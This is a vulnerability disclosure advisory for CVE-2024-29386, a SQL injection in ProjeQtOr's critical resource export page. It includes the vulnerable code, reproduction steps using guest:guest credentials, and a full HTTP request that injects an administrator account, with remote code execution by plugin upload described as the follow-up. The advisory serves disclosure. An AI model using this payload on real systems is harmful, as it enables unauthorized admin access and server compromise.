CVE-2024-29386

Advisory

Software brief introduction

ProjeQtOr is an Open Source project management software.

https://en.wikipedia.org/wiki/ProjeQtOr
https://www.projeqtor.org/en/product-en/downloads

Vulnerability description

Projeqtor up to v11.2.0 was discovered to contain a SQL injection vulnerability via the component /view/criticalResourceExport.php. Exploitation of this flow leads to privilege escalation by adding new user with known credentials and admin role and Remote code execution via plugin upload.

Issue

model/Affectable.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
...
class Affectable extends SqlElement {
...
public static function tranformPlanningResult($scale, $start, $end) {
...
$resourceTeamAffection = array();
$resourceTeamAffRate=array();
$idResourceTeam=array();
$planWork=new PlannedWork();
$tmpAss=new Assignment();
$critPlannedWork="idProject not in ".Project::getAdminitrativeProjectList(false);
$critPlannedWork.=" and workDate>='$start' and workDate<='$end'";
$lstPlanWork=$planWork->getSqlElementsFromCriteria(null, false, $critPlannedWork,null,null,true);
$loop['ideal']=array("real"=>$arrayRealWork, "planned"=>$arrayPlannedWork);
$loop['real']=array("real"=>$arrayRealWork, "planned"=>$lstPlanWork); // PBER : Not sure, possibly to remove back to "real"=>array()
...

view/CriticalResourceExport.php

1
2
3
4
5
6
7
8
9
...
$scale = RequestHandler::getValue('scaleCriticalResources');
$start = RequestHandler::getDatetime('startDateCriticalResources');
$end = RequestHandler::getDatetime('endDateCriticalResources');
$idProject = RequestHandler::getId('idProjectCriticalResources');
$limitedRow = RequestHandler::getNumeric('nbCriticalResourcesValue');
Affectable::getCriticalResourcePlanningResult();
Affectable::drawCriticalProjectResourceList($scale, $start, $end, $idProject, $limitedRow);
...

Steps to reproduce

  1. Login with guest:guest
  2. Send GET request to the path /view/criticalResourceExport.php?scaleCriticalResources=a&startDateCriticalResources= Injection_Here &endDateCriticalResources=Injection_Here

Proof of concept

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
## SQLi to create new user with admin Priv
## After connecting to new admin acc, we upload a new plugin containing RCE php shell

GET /view/criticalResourceExport.php?scaleCriticalResources=a&startDateCriticalResources=2023-02-01&endDateCriticalResources=2023-03-01'+%3b+insert+into+resource+values("4","lol",NULL,NULL,NULL,"5f4dcc3b5aa765d61d8327deb882cf99",1,0,1,0,0,NULL,NULL,NULL,NULL,1.00000,NULL,0,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,"md5",1,NULL,"2024-02-09","ab041450606933a7f4491fdc9bb9e2fd",0,NULL,NULL,NULL,NULL,0,0,0,NULL,NULL,0,0,NULL,NULL,0)+%3b+--+'%3b&idProjectCriticalResources=1&nbCriticalResourcesValue=1 HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/view/main.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=9p222uq7m4r7fvlurlpdo62s5i
If-Modified-Since: Sun, 11 Feb 2024 13:38:47 GMT
Connection: close

Timeline (DD-MM-YYYY)

  • 10-01-2024: Vulnerability identified
  • 14-02-2024: 1st vendor contact attempt via email
  • 05-03-2024: 2nd vendor contact attempt via email
  • 10-03-2024: 3rd vendor contact attempt via website forum
  • 12-03-2024: CVE requested
  • 24-03-2024: CVE assigned
  • 04-04-2024: CVE request publication

Conclusion

I discovered the issue during my journey at Mazars Cybersecurity as an application security consultant. The product owner was notified following their security policy via an email and public forum of the website but didn’t respond.